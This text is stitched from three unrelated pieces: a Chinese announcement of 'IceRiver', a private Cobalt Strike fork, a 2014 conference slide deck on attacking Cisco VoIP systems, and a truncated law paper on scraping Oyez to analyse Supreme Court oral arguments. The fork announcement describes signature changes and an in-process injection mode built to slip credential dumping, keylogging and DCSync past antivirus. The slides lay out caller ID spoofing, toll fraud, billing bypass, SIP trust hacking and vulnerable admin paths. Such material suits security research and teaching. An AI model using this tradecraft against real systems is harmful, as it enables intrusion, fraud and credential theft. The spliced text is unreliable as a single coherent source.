11 values
Attack2Defense星球专属版CobaltStrike发布 IceRiver 经过星球内⼤佬们的不懈努⼒,星球内部专属版CobaltStrike终于开发完成,我们将其命名为 IceRiver。IceRiver主要基于CobaltStrike 4.4 进⾏的⼆次开发,在修复了这个版本的⼀些bug的 同时,扩展了⼀些功能,下⾯进⾏详细介绍: 版本特性清单 修改特征  修改默认登录认证的header标志位数据  修改beacon配置信息的默认XOR密钥  修改配置数据所在堆块的默认值  修改HTTP ua头  修改HTTP Server默认的返回信息  在兼容ForeignHTTP和ForeignHTTPS监听器前提下修改stage uri⽣成算法 增加功能  teamserver添加双因⼦认证  主机统计  self inject模 式:Screenshot,Hashdump,Desktop,Printscreen,ChromeDump,PassTheHash(pth),DcSyn c,LogonPasswords,NetView(net),KeyLogger,PortScan,PowerShell(powerpick)  setchar:修改返回数据编码  内置winvnc 修复漏洞  修复CVE-2022-23317  修复Range头解析bug 添加双因素认证解决CS teamserver的登录问题 最近群⾥⽹传CS全版本被登录绕过的漏洞: 据我们分析很⼤可能是通过mysql蜜罐读取teamserver的密码。CS的客户端会将你的登录信息 保存到C:\Users\<user>\.aggressor.prop⽂件当中,通过mysql蜜罐直接..\遍历,或者读取 windows的⼀些配置⽂件,从⾥⾯找到系统当中⽤户的home路径,具体可参考⺾⽼师⽂章http s://www.zcgonvh.com/post/tips_of_arbitrary_file_read_on_windows.html .aggressor.prop⽂件的保存路径: client保存的配置信息当中就有teamserver的密码。 如此⼀来,进内⽹后再也不敢随便连接mysql了,万⼀蓝队搞了个mysql透明代理蜜罐,那就好 玩了,听说已经有⼈被搞了…… 但是如何防范?只需要启⽤teamserver双因⼦登录或者 iptables配置⽩名单,前者⽅便⼀点,IceRiver⾃带双因⼦登录功能。 特性说明 teamserver双因⼦登录 teamserver端部署需要⽣成google otp的验证码,⽣成验证码只需要打开client使⽤GenOtp窗 ⼝即可完成⽣成。 1. ⾸先运⾏client端,打开GenOtp窗⼝。 2. 点击generate⽣成随机secret key,可以修改account和title信息,这将显示在 Authenticator APP⻚⾯当中。 3. 复制并保存⽣成的secret数据到opt.code⽂件当中。 4. 点击ShowScanQRCode进⼊otp⼆维码扫码⻚⾯,使⽤google的Authenticator APP扫码 将会获得与secret绑定的验证码。 Authenticator显示的验证信息 5. 点击SaveQRCode可以选择保存⼆维码到本地⽂件当中。 6. 部署teamserver时需要将第3步当中保存的otp.code⽂件放到teamserver相同⽬录下,否则 会报错提示找不到验证⽂件,且⽆法登录teamserver 7. 启动teamserver后,在连接⻚⾯除了输⼊其他信息外,在AuthCode处输⼊APP上显示的6 位验证码,点击连接即可。 修改stage uri⽣成算法 当修改MSFURI⽣成算法后,会出现⽆法快速传递会话到MSF当中的情况,就是⽆法直接使⽤ spawn -> foreign http(s) listener传递会话,这⾥为了兼容便捷的传递会话,做了⼀些修改, 可以保证在满⾜⽆法被扫描出stage的情况下,快速传递会话到MSF当中。 self inject模式 开启该模式之 后,Screenshot,Hashdump,Desktop,Printscreen,ChromeDump,pth,DcSync,LogonPasswords, net,KeyLogger,PortScan,powerpick这些beacon当中需要fork & inject的后渗透模块将会注⼊ 到beacon所在的当前进程当中,可以绕过部分杀软对注⼊的拦截,使⽤⽅法与之前的 Attack2DefenseAgent相同,不再赘述。 内置winvnc 不再需要在teamserver端创建third-party⽬录并上传winvnc dll,已经集成进⼊jar包当中。 Range头解析bug ⽼外研究发现的⼀个teamserver的特征,修复完成。 修改HTTP Server默认的返回信息 ⽼外研究发现的⼀个teamserver的特征,修复完成。 参考资料  https://www.mdsec.co.uk/2022/07/part-1-how-i-met-your-beacon-overview/  https://www.mdsec.co.uk/2022/07/part-2-how-i-met-your-beacon-cobalt-strike/
www.senseofsecurity.com.au © Sense of Security 2013 Page ‹#› – 13-Sep-13 Compliance, Protection & Business Confidence Sense of Security Pty Ltd ! Sydney Level 8, 66 King Street Sydney NSW 2000 Australia Melbourne Level 10, 401 Docklands Drv Docklands VIC 3008 Australia T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au ABN: 14 098 237 908 VoIP Wars: Attack of the Cisco Phones www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Speaker • Fatih Ozavci • Senior Security Consultant • Interests • VoIP • Mobile Applications • Network Infrastructure ! • Author of Viproy VoIP Penetration Testing Kit • Public Speaker • Defcon, BlackHat Arsenal, AusCert, Ruxcon 2 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Viproy VoIP Toolkit • Viproy is a Vulcan-ish Word that means "Call" • Viproy VoIP Penetration and Exploitation Kit • Testing modules for Metasploit, MSF license • Old techniques, new approach • SIP library for new module development • Custom header support, authentication support • Trust analyser, SIP proxy bounce, MITM proxy, Skinny, VOSS • Modules • Options, Register, Invite, Message • Brute-forcers, Enumerator • SIP trust analyser,SIP proxy, Fake service • Skinny analysers, VOSS exploits 3 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Agenda 1. Hosted VoIP Services and Cisco 101 2. Network Infrastructure 3. Cisco Unified Communications Manager 4. IP Phone and Service Management 5. Attacking Desktop and Mobile Clients 4 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Hosted VoIP services 5 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Cisco VoIP environment • Web based services • IP Phone services (Cisco, VOSS) • Tenant client services (VOSS Selfcare) • Tenant* management services (Cisco HCS) • VoIP services • Skinny (SCCP) services for Cisco phones • SIP services for other tenant phones • RTP services for media streaming • PBX/ISDN gateways, network equipment ! * Tenant => Customer of hosted VoIP service 6 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Goals • Discover VoIP network configuration, design and requirements • Find Voice VLAN and gain access • Gain access using PC port on IP Phone • Understand the switching security for: • Main vendor for VoIP infrastructure • Network authentication requirements • VLAN ID and requirements • IP Phone management services • Supportive services in use 7 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Protected and isolated? 8 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Switching manipulation • Attack Types • PC Ports of the IP phone and handsets • CDP sniffing/spoofing for Voice VLAN • DTP and VLAN Trunking Protocol attacks • ARP spoofing for MITM attacks • DHCP spoofing & snooping • Persistent access • Tapberry Pi • Tampered phone • Power over ethernet (PoE) • 3G/4G for connectivity 9 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking the TFTP server • Obtaining configuration files for MAC addresses • SEPDefault.cnf, SEPXXXXXXXXXXXX.cnf.xml • SIPDefault.cnf, SIPXXXXXXXXXXXX.cnf.xml • Identifying SIP, Skinny, RTP and web settings • Finding IP phone software and updates • Configuration files may contain credentials • Digital signature/encryption usage for files ! ! ! Tip: TFTPTheft, Metasploit, Viproy TFTP module 10 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Configuration file content • <deviceProtocol>SCCP</deviceProtocol>! • <sshUserId></sshUserId>! • <sshPassword></sshPassword>! ! • <webAccess>1</webAccess>! • <settingsAccess>1</settingsAccess>! • <sideToneLevel>0</sideToneLevel>! • <spanToPCPort>1</spanToPCPort>! • <sshAccess>1</sshAccess>! ! • <phonePassword></phonePassword> 11 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Becoming the TFTP server • Send fake configurations for • HTTP server • IP phone management server • SIP server and proxy • Skinny server • RTP server and proxy • Deploy SSH public keys for SSH on IP Phones • Update custom settings of IP Phones • Deploy custom OS update and code execution ! Tip: Metasploit TFTP & FakeDNS servers, Viproy MITM proxy 12 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Unified Communications • Forget TDM and PSTN • SIP, Skinny, H.248, RTP, MSAN/MGW • Smart customer modems & phones ! • Cisco UCM • Linux operating system • Web based management services • VoIP services (Skinny, SIP, RTP) • Essential network services (TFTP, DHCP) • Call centre, voicemail, value added services 13 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Discovering VoIP servers • Looking for • Signalling servers (e.g. SIP, Skinny, H.323, H.248) • Proxy servers (e.g. RTP, SIP, SDP) • Contact Centre services • Voicemail and email integration • Call recordings, call data records, log servers ! • Discovering • Operating systems, versions and patch level • Management services (e.g. SNMP, Telnet, HTTP, SSH) • Weak or default credentials 14 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking SIP services • Essential analysis • Registration and invitation analysis • User enumeration, brute force for credentials • Discovery for SIP trunks, gateways and trusts • Caller ID spoofing (w/wo register or trunk) ! • Advanced analysis • Finding value added services and voicemail • SIP trust hacking • SIP proxy bounce attack 15 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Cisco specific SIP registration • Extensions (e.g. 1001) • MAC address in Contact field • SIP digest authentication (user + password) • SIP x.509 authentication • All authentication elements must be valid! ! • Good news, we have SIP enumeration inputs! Warning: 399 bhcucm "Line not configured” Warning: 399 bhcucm "Unable to find device/user in database" Warning: 399 bhcucm "Unable to find a device handler for the request received on port 52852 from” Warning: 399 bhcucm "Device type mismatch" 16 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Register and Subscribe 17 Register / Subscribe (FROM, TO, Credentials) www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Invite, CDR and Billing tests 18 Invite / Ack / Re-Invite / Update (FROM, TO, VIA, Credentials) www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 SIP Proxy Bounce attack 19 SIP Proxy Bounce Attacks • SIP trust relationship hacking • Attacking inaccessible servers • Attacking the SIP software and protocol • Software, Version, Type, Realm Melbourne Brisbane - Sydney Production SIP Service www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Denial of Service attacks 20 SIP based DoS attacks • UDP vulnerabilities and IP spoofing • Too many errors, very very verbose mode • ICMP errors Melbourne Brisbane - Sydney Production SIP Service Alderaan IP spoofed UDP SIP request www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Hacking SIP trust relationships 21 Send INVITE/MESSAGE requests with • IP spoofing (source is Brisbane), • from field contains Spoofed IP and Port, the caller ID will be your trusted host. IP spoofed UDP SIP request From field has IP and Port Melbourne Brisbane - Sydney Production SIP Service UDP Trust Universal Trust Tatooine www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking a client using SIP trust 22 IP spoofed UDP SIP request From field has bogus characters Melbourne Brisbane - Sydney Production SIP Service UDP Trust Universal Trust Tatooine It’s a TRAP! Send INVITE/MESSAGE requests with • IP spoofing (source is Brisbane), • from field contains special number, you will have fun or voicemail access. www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Toll fraud for CUCM • Cisco UCM accepts MAC address as identity • No authentication (secure deployment?) • Rogue SIP gateway with no authentication • Caller ID spoofing with proxy headers • Via field, From field • P-Asserted-Identity, P-Called-Party-ID • P-Preferred-Identity • ISDN Calling Party Number, Remote-Party-ID • Billing bypass with proxy headers • P-Charging-Vector (Spoofing, Manipulating) • Re-Invite, Update (With/Without P-Charging-Vector) 23 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Caller ID spoofing on CUCM Remote-Party-ID header Remote-Party-ID: <sip:007@>;party=called;screen=yes;privacy=off ! What for? • Caller ID spoofing • Billing bypass • Accessing voicemail • 3rd party operators 24 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Caller ID fraud for all operators? • Telecom operators trust source Caller ID • One insecure operator to rule them all 25 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Fake Caller ID for messages? • Call me back function on voicemail / calls • Sending many spoofed messages for DoS • Overseas? Roaming? • Social engineering (voicemail notification) • Value added services • Add a data package to my line • Subscribe me to a new mobile TV service • Reset my password/PIN/2FA • Group messages, celebrations 26 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 SIP advanced attacks demo 27 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking Skinny services • Cisco Skinny (SCCP) • Binary, not plain text • Different versions • No authentication • MAC address is identity • Auto registration ! • Basic attacks • Register as a phone • Disconnect other phones • Call forwarding • Unauthorised calls 28 Source: Cisco www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking Skinny services 29 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking Skinny services Viproy has a Skinny library for easier development and sample attack modules • Skinny auto registration • Skinny register • Skinny call • Skinny call forwarding 30 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking Skinny services Everybody can develop a Skinny module now, even Ewoks! ! Register Unauthorised Call 31 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Preparing a proper client for Skinny • Install Cisco IP Communicator • Change the MAC address of Windows • Register the software with this MAC 32 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Skinny register attack demo 33 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Skinny call attack demo 34 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Skinny call forwarding demo 35 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Cisco HCS • Cisco UC Domain Manager • VOSS IP Phone XML services • VOSS Self Care customer portal • VOSS Tenant services administration ! • Cisco Unified Communications Manager • Cisco Enterprise License Manager • Cisco VTG Interface • Cisco UCM – Dialed Number Analyzer • Cisco Unified Operating System Administration • Cisco Unified Serviceability • Cisco Unified Reporting • Cisco Unified CM CDR Analysis and Reporting 36 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 VOSS Self Care Tenant user services • Password & PIN management • Voicemail configuration • Presence • Corporate Directory access • Extension mobility ! Weaknesses • Privilege escalation vulnerabilities • Cross-site scripting vulnerabilities 37 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Account details stored XSS 38 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 VOSS administration • Tenant administration services • User management • Location and dial plan management • CLI and number translation configuration ! Weaknesses • User enumeration • Privilege escalation vulnerabilities • Cross-site scripting vulnerabilities • SQL injections and SOAP manipulations 39 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Errors, Information Leakage /emapp/EMAppServlet?device=USER ! ! ! ! /bvsm/iptusermgt/disassociateuser.cgi 40 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Insecure File Upload /bvsm/iptbulkadmin /bvsm/iptbulkloadmgt/bulkloaduploadform.cgi 41 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Privilege Escalation /bvsm/iptusermgt/moduser.cgi (stored XSS, change users’ role) /bvsm/iptadminusermgt/adduserform.cgi?user_type=adminuser ! ! ! ! ! /bvsm/iptnumtransmgt/editnumbertranslationform.cgi?id=1 ! 42 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 IP Phone management VOSS IP Phone XML services • Shared service for all tenants • Call forwarding (Skinny has, SIP has not) • Speed dial management • Voicemail PIN management 43 Services • speeddials • changepinform • showcallfwd • callfwdmenu Actions • CallForwardAll • CallForwardBusy www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 IP Phone management • Authentication and Authorisation free! • MAC address is sufficient • Jailbreaking tenant services ! • Viproy Modules • Call Forwarding • Speed Dial 44 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 VOSS call forwarding demo 45 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 VOSS speed dial demo 46 Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 VoIP client security • Different Client Types • Mobile, Desktop, Teleconference, Handsets • Information Disclosure • Unnecessary services and ports (SNMP, FTP) • Weak management services (Telnet, SSH, HTTP) • Stored credentials and sensitive information • Unauthorised Access • Password or TFTP attacks, enforced upgrades • Weak VoIP Services • Clients may accept direct invite, register or notify 47 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Cisco VoIP clients • Cisco IP Phones • Cisco IP Communicator • Cisco Unified Personal Communicator • Cisco Webex Client • Cisco Jabber services • Cisco Jabber Voice/Video • IM for 3rd party clients • Mobile, desktop, Mac • Jabber SDK for web 48 Source: www.arkadin.com www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Rogue services and DSITM • Use ARP/DNS Spoof & VLAN hopping & Manual config • Collect credentials, hashes, information • Change client's request to add a feature (e.g. Spoofing) • Change the SDP features to redirect calls • Add a proxy header to bypass billing & CDR • Manipulate request at runtime to find BoF vulnerabilities • Trigger software upgrades for malwared executables 49 Death Star in the Middle www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking a client using SIP service • Caller ID spoofed messages • to install a malicious application or an SSL certificate • to redirect voicemails or calls • Fake caller ID for Scam, Vishing or Spying • Manipulate the content or content-type on messaging • Trigger a crash/BoF on the remote client • Inject cross-site scripting to the conversation ! • Proxies with TLS+TCP interception and manipulation • Em-proxy (github.com/fozavci/em-proxy) • MITMproxy 50 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Traffic manipulation as DSITM 51 Video demo for custom protocols attacks • force upgrade ??? • initiate a call ??? • call voip extension/plugin through browser using html ??? ! ! ! Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking a client using SIP trust • SIP server redirects a few fields to client • FROM, FROM NAME, Contact • Other fields depend on server (e.g. SDP, MIME) • Message content • Clients have buffer overflow in FROM? • Send 2000 chars to test it ! • Crash it or execute your shellcode if available • Clients trust SIP servers and trust is UDP based • Trust hacking module can be used for the trust between server and client too. • Viproy Penetration Testing Kit SIP Modules • Simple fuzz support (FROM=FUZZ 2000) • You can modify it for further attacks 52 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking a client using SIP trust 53 IP spoofed UDP SIP request From field has bogus characters Melbourne Brisbane - Sydney Production SIP Service UDP Trust Universal Trust Tatooine Crash! Adore iPhone App Send INVITE/MESSAGE requests with • IP spoofing (source is Brisbane), • from field contains exploit, the client will be your stormtrooper. www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Attacking a client using SIP service 54 Video demo for SIP based client attacks • Manipulating instant messaging between clients • Initiate a call using fake Caller ID • Send a fake message from the Operator • Send bogus message to crash • Send too many calls and create a crash ! Video Demonstration www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Solutions • Install the Cisco security patches • From CVE-2014-3277 to CVE-2014-3283 • CSCum75078, CSCun17309, CSCum77041, CSCuo51517, CSCum76930, CSCun49862 • Secure network design • IP phone services MUST be DEDICATED, not SHARED • Secure deployment with PKI • Authentication with X.509, software signatures • Secure SSL configuration • Secure protocols • Skinny authentication, SIP authentication • HTTP instead of TFTP, SSH instead of Telnet 55 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 References • Viproy Homepage and Documentation http://www.viproy.com ! • Attacking SIP servers using Viproy VoIP Kit https://www.youtube.com/watch?v=AbXh_L0-Y5A ! • VoIP Pen-Test Environment – VulnVoIP http://www.rebootuser.com/?cat=371 ! • Credit and thanks go to… Jason Ostrom, Mark Collier, Paul Henry, Sandro Gauci 56 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 Questions ? 57 www.senseofsecurity.com.au © Sense of Security 2014 Page of 58 – Aug-14 58 Thank you Recognised as Australia’s fastest growing information security and risk management consulting firm through the Deloitte Technology Fast 50 & BRW Fast 100 programs Head office is level 8, 66 King Street, Sydney, NSW 2000, Australia. Owner of trademark and all copyright is Sense of Security Pty Ltd. Neither text or images can be reproduced without written permission. T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au
Can Homegrown Information Analysis Tools Help Us Make Better Predictions about the Outcome of Supreme Court Cases? Foofus Table of Contents Introduction..........................................................................................................................................1 Gathering Argument Data via the Web.................................................................................................2 Technical Background.....................................................................................................................2 Interacting with the Oyez Web Server.............................................................................................4 Limitations.......................................................................................................................................5 The Justices..........................................................................................................................................7 Anthony Kennedy............................................................................................................................8 Scorecard.....................................................................................................................................8 Discussion...................................................................................................................................8 Antonin Scalia................................................................................................................................10 Scorecard...................................................................................................................................10 Discussion ................................................................................................................................10 Clarence Thomas...........................................................................................................................12 Scorecard...................................................................................................................................12 Discussion.................................................................................................................................12 Elena Kagan...................................................................................................................................13 Scorecard...................................................................................................................................13 Discussion.................................................................................................................................13 John G. Roberts, Jr.........................................................................................................................14 Scorecard...................................................................................................................................14 Discussion.................................................................................................................................14 Ruth Bader Ginsburg.....................................................................................................................15 Scorecard...................................................................................................................................15 Discussion.................................................................................................................................15 Samuel A. Alito, Jr.........................................................................................................................17 Scorecard...................................................................................................................................17 Discussion.................................................................................................................................17 Sonia Sotomayor............................................................................................................................18 Scorecard...................................................................................................................................18 Stephen G. Breyer..........................................................................................................................20 Scorecard...................................................................................................................................20 Discussion.................................................................................................................................20 The Court As a Whole........................................................................................................................21 Case Outcomes..............................................................................................................................21 Decisional Patterns........................................................................................................................22 Concluding Thoughts.........................................................................................................................23 Introduction In 2005, Professor Jay Wexler of Boston University published an article in which he purported to identify the funniest sitting United States Supreme Court justice by reviewing transcripts of oral arguments and counting the number of times the record reflected laughter.1 On the surface, this short and enjoyable article seems frivolous, but it raises an interesting possibility. Specifically, although the bulk of Supreme Court punditry focuses on specific cases or arguments, it is possible to learn things about the justices by aggregate analysis of oral arguments. Such an approach will never be a substitute for analysis of policy or legal theory: it is issue-neutral. That characteristic, however, is also a strength: the possibility of spotting patterns or trends in the way the justices interact might be useful in cases where an individual justice’s opinion is in doubt, or where it is desirable to counterbalance possible preconceptions of the part of the analyst. At the very least, sifting through the complete library of arguments heard by members of the current court can give outsiders a better-rounded view of interactions on the court by placing any given oral argument in a broader context. This paper presents a first attempt at such analysis, using materials available from the Oyez Project.2 The research consisted of three major phases: development of software tools to facilitate the collection and organization of Supreme Court argument materials, the actual use of those tools to harvest data for every case heard by a currently sitting member of the Supreme Court, and the analysis and presentation of that material. The goal was to study whether it is feasible to draw inferences either about some individual justices or about the court as a whole based simply on numerical analysis of case data. The question of whether any of the justices have mannerisms at oral argument that telegraph their votes is a complex one, and this paper admittedly only scratches the surface of the topic. Nevertheless, even in the context of this research, it is possible to observe, for at least four justices, patterns in their 1 Jay D. Wexler, Laugh Track, 9 GREEN BAG 2d 59. 2 See, http://www.oyez.org (last visited May 12, 2011). -1- interactions with the advocates that correlate with their eventual votes. Gathering Argument Data via the Web Before addressing the specifics of the Oyez web site, a brief explanation of the underlying technology involved is warranted to ensure that the reader is acquainted with the necessary terms, and can better understand the process involved. Technical Background The World Wide Web is a collection of Internet-connected systems sharing data3 via the Hypertext Transfer Protocol (HTTP). Most users experience the Internet by using a web browser.4 In this context, a web browser is a piece of software that sends HTTP requests for web resources (documents, images, video, etc.) to various web servers which respond to these requests by furnishing the requested materials, again via HTTP. For the purposes of this discussion, the inner details of HTTP are unimportant, it is enough to understand that HTTP is a simple request-response protocol: a client (usually a web browser) issues a request, the server responds, and the transaction is complete. The figure below is a transcript of a simple HTTP conversation: a client requests a document,5 and the server returns it. The text in bold is issued by the client, and the remainder is the server’s response. 3 In re Doubleclick Privacy Litig., 154 F. Supp. 2d 497, 501 (S.D.N.Y. 2001) 4 Currently popular web browsers include Internet Explorer, Firefox, Chrome, Safari, and Opera, but there have been others, such as Netscape Navigator and Mosaic. 5 See http://www.foofus.net/foofus/test.html (last visited April 30, 2011); the reader is invited to visit this URL in order to see the page rendered in an actual web browser. -2- Simple HTTP Transaction with the www.foofus.net Web Server GET /foofus/test.html HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 25 Apr 2010 15:38:50 GMT Server: Apache/2.2.3 (Unix) PHP/5.2.0 mod_ssl/2.2.3 OpenSSL/0.9.8l Last-Modified: Sun, 25 Apr 2010 15:38:03 GMT ETag: "2eb83e-57-7227ecc0" Accept-Ranges: bytes Content-Length: 87 Connection: close Content-Type: text/html <HTML> <HEAD><TITLE>Test Page</TITLE></HEAD> <BODY>This is a test page</BODY> </HTML> The web server’s response begins with a set of “headers:” information about the response itself. The headers let the browser know that the client's request will be honored (the “200 OK” response code), the type of web server software in use (Apache),6 the date end time of the transaction, and some facts about the response itself: the length of the response (87 bytes), and what the response consists of (an HTML document), which begins after the blank line. HTML stands for HyperText Markup Language,7 a standard for describing both the form and the content of a web page. In the example above, the underlined and italicized portions of the document are HTML “tags” used to describe the layout of the web page (in this case, which portions constitute the title, to be shown in the web browser’s title bar, and which portions constitute the body of the document, to be displayed in the browser’s main window).8 The same fundamental transaction is played out behind the scenes of every web surfing session: the web browser requests some material from a web server, the web server returns a block of data that describes both the information to be presented to the user and the format in which the 6 See http://www.apache.org/ (last visited April 30, 2011). 7 See http://www.w3.org/wiki/HTML (last visited April 30, 2011) 8 HTML tags can also describe links, images, forms, and a variety of other document types that might be embedded in web pages. -3- information should be presented, and the web browser renders the content for the user in the manner directed. Interacting with the Oyez Web Server The oyez.org web site provides a facility for the public to review the activities of the United States Supreme Court. Specifically, it allows users to browse the docket for any given term, view a summary of each case, and even listen to the oral arguments (and in some cases also opinion announcements9). As an added feature, the site provides an “expanded view” of the oral argument, which displays the transcript of the oral arguments synchronized with the original audio. Oral argument transcripts are stored as XML files.10 XML is a specification similar to HTML, except its intent is to make content more easily accessible to programs, rather than human readers.11 In order to gather the necessary underlying data for this research, two programs were developed in the perl programming language.12 Each of these programs basically automates a set of actions that could be taken by a human being with a web browser, and records the results. The first program systematically downloads the court’s complete docket for a given year. Its output is a file containing a list of cases; for each case it records the caption, docket number, argument date, decision date, majority decision author, and the vote split. Using this program, it was possible to make a master docket list of all cases heard by since Justice Scalia was elevated to the court in 1986 up to April 30, 2011.13 The second program is more complex: it takes the master docket file and a list of 9 See, e.g., The Oyez Project, Tison v. Arizona, 481 U.S. 137 (1987) available at: (http://oyez.org/cases/1980-1989/1986/1986_84_6075) (last visited Saturday, May 7, 2011). 10 See http://www.w3.org/XML/ (last visited on May 12, 2011). 11 The files are intended to be parsed by the oral argument display applet that allows those listening to an argument to follow along with the text, but the they are just as easily parsed by other software, such as that created in the course of this study. 12 See http://www.perl.org/ (last visited on April 30, 2011). 13 This cutoff date is arbitrary, but it was important at some point to stop merely collecting data and to begin analyzing it. -4- the current justices as inputs and constructs a series of web requests. There are three main outputs: 1. For each case, the program creates a file whose contents reflect whether the petitioner or the respondent prevailed, how each justice voted, the citation, and who the advocates for each party were. 2. For each justice, the program creates several files: a list of cases in which the justice participated, a list of cases the in which the justice did not participate, a list of cases in which the justice voted with the majority, a list of cases in which the justice voted with the minority, and lists of cases in which the justice wrote a concurrence, dissent, or joined another justice’s concurrence or dissent. 3. The transcript file for the case’s oral argument. The net result is a complete collection of each justice’s voting record, along with results and oral argument transcripts for every case heard by any combination of the current members of the United States Supreme Court. Some efforts were required to account for inconsistencies in the data: Oyez is not completely faithful to its naming conventions (e.g., in the oral argument transcript files, Justice Roberts is sometimes referred to as “John_G_Roberts” and sometimes as “john_g_roberts_jr;” Justice Sotomayor is alternately “justice_sotomayor” or “sonia_sotomayor,” and so forth). Likewise, some justices (e.g., John Roberts and Elena Kagan) appeared in transcripts as advocates before they were elevated to the court. Limitations There are a number of important limitations affecting data gathered in this way. The first and most obvious has already been mentioned: this analysis places no weight -5- whatsoever on the merits of the case at bar, the issues at stake, or the briefs submitted. It makes no sense to think that cases are decided without attention to these factors, and as a result, the findings presented here represent a form of insight into Supreme Court decision-making that is untethered to the issues surrounding any particular case. Second, for the purposes of this research, we are accepting Oyez’s analysis of which party prevailed in the case. For example, a case might present several questions, some of which the court might answer in favor of the petitioner, and some in favor of the respondent, making it at least somewhat unclear which party has “won.” A more nuanced analysis might take the nature of the issues into account, but that is too complex an undertaking for this effort. The data from Oyez are also not 100% uniform, and this presents a technical problem. When parsing the oral argument files, the only way to decide whether a justice’s question is asked of the petitioner or the respondent is by the name of the advocate to whom the question is addressed. The Oyez pages summarizing a case name the advocates, but in some cases fail to specify which side they represented. Likewise, readers with an actuarial bent will notice that for some justices, particularly those who have been on the court the longest, the total number of cases heard by the court during a Justice’s tenure is slightly higher than the sum of the number of cases in which the Justice voted for the majority, the number of cases in which the justice voted for the minority, and the number of cases in which the justice did not participate. Again, this represents some minor inconsistency in the way that Oyez has recorded the justices’ votes, and the relatively few missing votes could be found through further research, but because the margin of error is less than 1%, the degree of extra precision to be had by tracking down the missing votes is not worth the rather substantial effort required to review hundreds of case records for single voting anomalies. The only data-related flaw of substance is that Oyez seems not to have reported -6- the justices’ votes for 78 cases in the 2008 term, as well as 23 other cases between 2006 and 2010.14 This was only discovered late in the analysis, when producing graphs to detect trends in the justices’ voting patterns, and time did not permit tabulation of the votes in these cases. Once again, this information is available, albeit not from Oyez, should some intrepid future researcher find value in filling in the lacunae that remain in this initial paper. Finally, it is important to note that the findings for the individual justices have differing weights. For a justice who speaks only rarely at oral argument, or a justice who is new to the court, even a seemingly stark pattern may not justify a strong conclusion, simply because there is not enough data to go on. The Justices This section provides an overview of the findings for each justice. The first item is a scorecard with a brief numerical synopsis of the justice’s record on the court. The second section presents analysis of the oral argument data for cases in which the justice participated. The oral argument transcripts identify the speaker of each utterance. For the purposes of this analysis, no attempt was made to differentiate between utterances based on their nature (e.g., questions, comments, jokes, etc.): it is simply assumed that every time a justice speaks, it is to ask a question. Questions come in only three 